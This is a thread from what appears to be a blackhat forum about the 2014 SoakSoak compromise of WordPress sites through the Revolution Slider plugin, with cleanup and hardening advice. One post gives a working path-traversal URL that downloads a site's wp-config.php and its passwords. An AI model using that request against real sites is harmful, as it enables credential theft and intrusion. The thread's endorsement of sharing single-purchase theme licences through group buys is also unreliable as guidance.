


Search (advanced search) | ||||
Use this Search form before posting, asking or make a new thread.
|
02-05-2015, 06:57 AM
Post: #21
|
|||
|
|||
RE:
Wordfence alerts users about buggy plugins and themes.
|
|||
02-05-2015, 05:34 PM
Post: #22
|
|||
|
|||
RE:
@Bale - It is NOT the core. I update daily and suffered from SoakSoak
@Intrapreneur - I say yes and another user has been hacked with the updated version despite what the devs say (Check the Sucuri forum) @Angelina - See above @Intrepid - Did not in this case Sucuri and 9 other plugins failed to stop this. The ONLY answer to prevent the next version of Soaksoak is: Cloudflare (Use their geo blocking) Custom .htaccess files. NO PLUGIN WILL EVER STOP THESE ATTACKS!!!!!! It's the architecture of Wordpress, MySQL and PHP that makes it possible. |
|||
02-05-2015, 05:49 PM
Post: #23
|
|||
|
|||
RE:
PS - This hit over 100,000 sites on december 14, and more since - one of the largest hacks. Through ONE plugin's bad coding. However the coder caused it, he was the one who 'fixed' it. Credibility of vendor = 0 in my books. The way they were speaking, it's an outsourced coder, not in-house.
Believe them at your own risk. |
|||
02-05-2015, 08:58 PM
Post: #24
|
|||
|
|||
RE:
SQL Injection attacks and how they work :
http://www.unixwiz.net/techtips/sql-injection.html If it was cPanel - almost every site in the World would be hacked. |
|||
02-05-2015, 09:20 PM
Post: #25
|
|||
|
|||
RE:
(02-04-2015 05:46 AM)utahman1971 Wrote:It's not correct(02-03-2015 10:33 PM)danimation3d Wrote: Woah far out, where'd you download this theme?Sorry, but GB is not way to go, because you don't get a license with Themeforest. There is only one license, and that is the purchaser that gets it, and if that person shares his license, then the license gets deactivated. GB if they do it, should not share license, but that is bad for the group that pays, because they paid for a no license for the theme. How many people on the internet are honest? If you do GB for extended license of the theme, that is way more money for extended license, which makes the license able to be multiple shared. All of themes on Themeforest do not require activation, that's mean theme does not call back to developer so people on a group buy can use the theme without worry about malicious code inserted. The licenset txt file usually is a text file for agreement etc...Group buy always is my choice |
|||
02-05-2015, 11:58 PM
(This post was last modified: 02-05-2015 11:59 PM by ImGrateful.)
Post: #26
|
|||
|
|||
RE:
I'm saying in a general way that my opinion is revolution slider is already defamed by many all over web, it has many loopholes
which invite hackers
I Wish You Always Stay Happier and Become More Wealthier
Day that changes everything Jim Rohn |
|||
02-06-2015, 12:31 AM
Post: #27
|
|||
|
|||
RE:
(02-05-2015 08:58 PM)grumble Wrote: SQL Injection attacks and how they work : Thanks for sharing insights with our BBHF family. This link might be useful for you n others http://blog.sucuri.net/2014/09/slider-re...oited.html Also your blog post is a blessing for us http://jam88.com/index.php/blog/ Is your site completely cleaned now?
I Wish You Always Stay Happier and Become More Wealthier
Day that changes everything Jim Rohn |
|||
02-06-2015, 07:56 AM
Post: #28
|
|||
|
|||
RE:
@Imgrateful All my sites were cleaned within 24 hours (I had 3, clients had 2) and I cleaned over 30 for another person.
The Sucuri blog was one of many places I researched when I was fixing it. I spent 2 weeks researching how it happened and how to prevent it and 4 weeks learning how to secure sites. CloudFlare serves up 'local' copies of your site so the hacker only gets to the CDN (Content Delivery Network) and .htaccess works at server level to prevent read and write operations of any type you specify. Wordpress (and Joomla, Drupal etc.) are 'underneath' the server so cannot effectively control server operations. You're welcome - Nice when people say thanks :-) |
|||
02-06-2015, 08:23 AM
(This post was last modified: 02-06-2015 08:24 AM by Xecution.)
Post: #29
|
|||
|
|||
RE:
Holy crap, I am glad I found this thread.
Anyone using Revolution Slider, simply type in the following command and viola, you have downloaded the config file and now have passwords, etc. Code: http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
B E S T B L A C K H A T F O R U M
(™))::::::::({/,/,/,/,// X 3 C //,/,/,/,/,/,/,`> |
|||
02-06-2015, 09:12 AM
Post: #30
|
|||
|
|||
RE: | |||